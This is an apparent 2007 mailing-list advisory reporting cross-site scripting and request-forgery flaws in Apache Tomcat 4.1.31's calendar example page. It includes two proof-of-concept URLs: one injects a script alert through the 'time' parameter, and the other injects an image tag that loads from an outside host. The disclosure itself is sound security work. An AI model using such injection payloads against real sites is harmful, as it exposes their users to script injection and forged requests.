Date: 4 Sep 2007 03:00:44 -0000
From: [email protected]
To: [email protected]Subject: Apache tomcat calendar example cross site scripting and cross
site request forgery vulnerability
X-Virus-Scanned: antivirus-gw at tyumen.ru
Apache Tomcat/4.1.31 ships with built in examples. One of the example calendar.jsp suffers from input validation error and could be exploited for cross site scriptingand cross site request forgery.
XSS
http://myserver:myport/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert("XSS!")%3c%2fscript%3e
XSRF
http://myserver:myport/examples/jsp/cal/cal2.jsp?time=><img%20src="http://xsrfxonfirmed.com/testimage.gif">
-
Tushar Vartak